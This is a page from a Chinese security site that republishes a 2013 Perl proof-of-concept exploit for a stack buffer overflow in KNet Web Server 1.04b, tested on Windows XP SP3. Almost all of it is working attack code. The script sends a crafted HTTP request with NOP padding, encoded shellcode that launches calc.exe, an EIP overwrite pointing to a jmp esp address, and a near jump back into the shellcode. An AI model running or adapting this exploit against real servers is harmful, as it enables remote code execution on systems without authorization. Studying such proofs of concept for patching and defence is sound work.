首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
KNet Web Server 1.04b - Stack Corruption BoF
来源: http://www.justanotherhacker.com 作者:Wireghoul 发布时间:2013-04-15  

#!/usr/bin/perl
# KNet Web Server Stack corruption BoF PoC
# Written by Wireghoul - http://www.justanotherhacker.com
# Date: 2013/04/11
# Version: 1.04b
# Tested on: WinXP SP3

use IO::Socket::INET;
$host = shift;
$port = shift;
print "KNet Web Server stack corruption BoF PoC - Wireghoul -
http://www.justanotherhacker.com\n";
die "Usage $0 <host> <port>\n" unless $host && $port;
$sock = IO::Socket::INET->new("$host:$port") or die "Unable to connect to
$host:$port\n";

# Shellcode for calc.exe
$shellcode=
"\x89\xe2\xda\xd5\xd9\x72\xf4\x5d\x55\x59\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" .
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" .
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" .
"\x42\x75\x4a\x49\x6b\x4c\x78\x68\x4e\x69\x45\x50\x73\x30" .
"\x63\x30\x61\x70\x6e\x69\x78\x65\x75\x61\x39\x42\x62\x44" .
"\x6c\x4b\x51\x42\x34\x70\x4e\x6b\x72\x72\x46\x6c\x4e\x6b" .
"\x71\x42\x37\x64\x4e\x6b\x44\x32\x36\x48\x54\x4f\x4e\x57" .
"\x53\x7a\x35\x76\x76\x51\x39\x6f\x44\x71\x4b\x70\x4e\x4c" .
"\x77\x4c\x35\x31\x73\x4c\x47\x72\x64\x6c\x67\x50\x4a\x61" .
"\x78\x4f\x54\x4d\x33\x31\x68\x47\x49\x72\x6a\x50\x73\x62" .
"\x63\x67\x6c\x4b\x52\x72\x66\x70\x6e\x6b\x53\x72\x77\x4c" .
"\x63\x31\x48\x50\x6e\x6b\x73\x70\x64\x38\x6e\x65\x69\x50" .
"\x52\x54\x50\x4a\x65\x51\x48\x50\x56\x30\x4c\x4b\x70\x48" .
"\x47\x68\x4c\x4b\x42\x78\x37\x50\x66\x61\x78\x53\x39\x73" .
"\x77\x4c\x57\x39\x4c\x4b\x75\x64\x4c\x4b\x77\x71\x38\x56" .
"\x70\x31\x59\x6f\x76\x51\x39\x50\x6c\x6c\x6f\x31\x6a\x6f" .
"\x34\x4d\x53\x31\x78\x47\x45\x68\x79\x70\x42\x55\x6b\x44" .
"\x77\x73\x61\x6d\x59\x68\x47\x4b\x51\x6d\x34\x64\x62\x55" .
"\x4d\x32\x31\x48\x4c\x4b\x71\x48\x47\x54\x37\x71\x4e\x33" .
"\x43\x56\x4e\x6b\x76\x6c\x32\x6b\x6c\x4b\x70\x58\x57\x6c" .
"\x36\x61\x79\x43\x6e\x6b\x73\x34\x6e\x6b\x33\x31\x4a\x70" .
"\x4b\x39\x73\x74\x34\x64\x54\x64\x63\x6b\x31\x4b\x65\x31" .
"\x33\x69\x72\x7a\x70\x51\x39\x6f\x69\x70\x70\x58\x31\x4f" .
"\x52\x7a\x6c\x4b\x36\x72\x58\x6b\x6b\x36\x73\x6d\x63\x5a" .
"\x55\x51\x4c\x4d\x6b\x35\x6c\x79\x35\x50\x63\x30\x65\x50" .
"\x66\x30\x35\x38\x46\x51\x6e\x6b\x50\x6f\x4c\x47\x79\x6f" .
"\x6e\x35\x4d\x6b\x5a\x50\x68\x35\x6f\x52\x62\x76\x42\x48" .
"\x6f\x56\x6d\x45\x4f\x4d\x6f\x6d\x4b\x4f\x7a\x75\x75\x6c" .
"\x66\x66\x31\x6c\x74\x4a\x6f\x70\x79\x6b\x4b\x50\x52\x55" .
"\x53\x35\x6d\x6b\x50\x47\x36\x73\x42\x52\x52\x4f\x72\x4a" .
"\x45\x50\x72\x73\x6b\x4f\x6b\x65\x30\x63\x33\x51\x52\x4c" .
"\x50\x63\x64\x6e\x51\x75\x42\x58\x45\x35\x57\x70\x41\x41";

$dist=1003-length($shellcode);
$payload = "\x90"x$dist; # Distance to overwrite EIP
$payload.=$shellcode;
$payload.="\x90" x 8; #Spacer between EIP and shellcode
$payload.= "\x53\x93\x42\x7e"; #Overwrite EIP with jmp esp
$payload.="\x90\x90\x90\x90\xE9\xF4\xFC\xFF\xFF"; #stack padding + BP +
Near jmp-300
$payload.=" / HTTP/1.0\r\n\r\n"; # Needs to be a valid HTTP request

print $sock $payload;
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Nagios Remote Plugin Executor
·AT-TFTP Server 2.0 - Stack Bas
·Ruby Gem kelredd-pruview 0.3.8
·MinaliC Webserver 2.0.0 - Buff
·MongoDB nativeHelper.apply Rem
·Ruby Gem md2pdf Command Inject
·ircd-hybrid 8.0.5 Denial Of Se
·Free Float FTP Server USER Com
·TRENDNet IP Cam Authentication
·SAP ConfigServlet OS Command E
·DLink DIR-645 / DIR-815 diagno
·TP-LINK TL-WR741N / TL-WR741ND
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved